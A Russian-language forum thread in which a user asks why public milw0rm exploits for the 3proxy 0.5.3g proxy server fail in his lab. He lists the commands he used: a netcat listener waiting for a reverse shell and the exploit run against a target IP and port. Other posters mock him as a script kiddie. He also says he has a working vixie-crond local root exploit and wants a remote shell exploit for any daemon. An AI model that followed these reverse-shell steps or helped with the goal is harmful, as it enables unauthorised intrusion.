![]() |
Не пойму причину неработоспособности эксплота для 3proxy 0.5.3g
Сам код эксплоита: h_ttp://milw0rm.com/exploits/3829
Тестил в локальное сети. 192.168.2.6 - адрес 3proxy сервера (gentoo 2007, 2.6.23) 192.168.2.3 - адрес атакующего 1. gcc exp.c -o exp 2. nc -l -p 56789 3. ./exp 192.168.2.6 3128 192.168.2.3 0 после выполнения сплоит выдает attacker host, check it up, now! И в итоге нихрена - нет какт молчит команды не выполняет? в чем трабл - что я делаю не так? __________________________________________________ __ Так же пробовал другой эксплоит... h_ttp://milw0rm.com/exploits/3821 с ним таже ситуация - не работает! И вообще в случае с этим сплоитом нужно ли выполнять nc 192.168.2.6 <забинденный порт?> или сплоит автоматом биндит, бэкконектится и предоставляет шелл? |
ДА! И правда!! Вот какого хера они неправильно и криво пишут свои 3proxy, что эксплойты не работают против них! В СУД ПОДАТЬ!!!
|
Вообще софт должен писаться под существующие эксплойты. Разработчики должны были на milw0rm сходить, посмотреть коды эксплойтов для их программного продукта и уже в соответствии со сплойтами писать свою программу так, чтобы сплойты работали сразу же после скачивания и хацкеру не нужно было даже лезть в исходник :)
|
Цитата:
|
to krypt3r:
лучше бы по существу что написал... где кривожопность сплоита убрать что бы пахал. :) |
Цитата:
Опять будут кривожопые скрипткиддисы хакать все подряд (ничего личного) |
Цитата:
|
>>>К тому же когда кидисы были пробемой
ВСЕГДА!!! П.С. - не думал о том что сервис может быть патченый админами которые тоже знают что такое МИЛВОРМ? |
Цитата:
Цитата:
Local Root exploit я нашел, работает на ура через багу vixie-crond на ядре 2.6.16.15... Остаьное тоже все есть и работает как надо... Осталось только найти работающий удаленнй эксплоит под любой демон,и который возвращает шелл или биндит его хотябы... |
| Время: 14:58 |